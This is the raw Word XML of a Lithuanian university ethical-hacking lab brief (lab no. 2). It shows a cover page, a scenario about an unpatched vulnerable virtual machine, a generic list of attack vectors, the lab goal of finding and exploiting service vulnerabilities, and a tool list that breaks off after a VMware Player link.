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D6224" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KAUNO TECHNOLOGIJOS UNIVERSITETAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AFB63" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CAC5A1" w14:textId="4B689E89" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001350E8" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KOMPIUTERIŲ</w:t>
      </w:r>
      <w:r w:rsidR="001700D3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KATEDRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C81F6" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE2975A" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D5417E" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283E6AE6" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D97B139" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F76D656" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D097A2E" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA127D9" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6482BAAC" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064048A8" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B300548" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Saugumo patikros ir etiško įsilaužimo technologijos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C479A76" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>T120M154</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD6BB8" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Laboratoriniai darbai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A5D4C" w14:textId="2DF51CED" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001350E8" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NR. </w:t>
      </w:r>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879CBDB" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038E6097" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081C24AD" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB7AD95" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338AF177" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745E2EE1" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3966F9" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21303467" w14:textId="5856F3D7" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="00635B32" w:rsidP="00635B32">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atliko:</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009A4EA1">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eligijus Kiudys IMF-1/3</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51571401" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A75A3C" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733D6A8A" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162D198F" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3A4C4D" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668E1F81" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755B8987" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B7EEF0" w14:textId="324FA4E9" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kaunas, </w:t>
      </w:r>
      <w:r w:rsidR="00165FC0" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0058631D">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256406F" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="020FDB04" w14:textId="77777777" w:rsidR="008F3A57" w:rsidRPr="00607DC0" w:rsidRDefault="008F3A57" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Legenda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D6692" w14:textId="44AD9B73" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="005567DF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Informacinė</w:t>
      </w:r>
      <w:r w:rsidR="00110871" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema naudojama paslaugoms užtikrinti. Tinklo administratorius nebuvo toks pareigingas ir senai nėra atnaujinęs paslaugų („services“). Dėl šios priežasties virtualioje aplinkoje tiekiamos paslaugos tapo pažeidžiamomis. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F495E3" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Tinklų administratorius įvardijo galimus atakų vektorius: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2027196B" w14:textId="24EF444A" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IP adresai, tinklo kaukės, paslaugos („services“), prievadai („port“);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706E7FA" w14:textId="13CB4E6D" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paliktos saugumo spragos bei perduodant infrastruktūrą nugvelbti slaptažodžiai;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE2DF2" w14:textId="6AB51960" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įsilaužimai į viešai pasiekiamas svetaines, serverius, keičiant turinį, vagiant slaptažodžius;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9333DC" w14:textId="06233134" w:rsidR="00EF602D" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualios aplinkos užvaldymas ir netiesioginės vidinių tinklo paslaugų atakos</w:t>
      </w:r>
      <w:r w:rsidR="00F63E73" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F234886" w14:textId="76896530" w:rsidR="00F63E73" w:rsidRPr="00607DC0" w:rsidRDefault="00F63E73" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pažeidimo įrodymų fiksavimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80F8BE" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155777B3" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4913D0B0" w14:textId="58FE2FF6" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. Darbo tikslas</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3258049E" w14:textId="75B60068" w:rsidR="009C5598" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nustatyti tinkle veikiančias paslaugas ir jų versijas. Surasti veikiančių paslaugų pažeidžiamumus, juos išnaudoti</w:t>
      </w:r>
      <w:r w:rsidR="0058196C" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (įsilaužti)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56804C4D" w14:textId="77777777" w:rsidR="00D34404" w:rsidRPr="00607DC0" w:rsidRDefault="00D34404" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D70B80" w14:textId="10A6E965" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc306063734"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. Darbo priemonės</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0F98E" w14:textId="47C85D1B" w:rsidR="00110871" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualios, pažeidžiamos Linux OS atvaizdas; </w:t>
      </w:r>
      <w:r w:rsidR="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ware (zip) failas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A462A9C" w14:textId="53FE45BE" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">VMware Workstation Player (nemokama) </w:t>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.vmware.com/products/workstation-player.html" </w:instrText>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="001C123C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://www.vmware.com/products/workstation-player.html</w:t>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
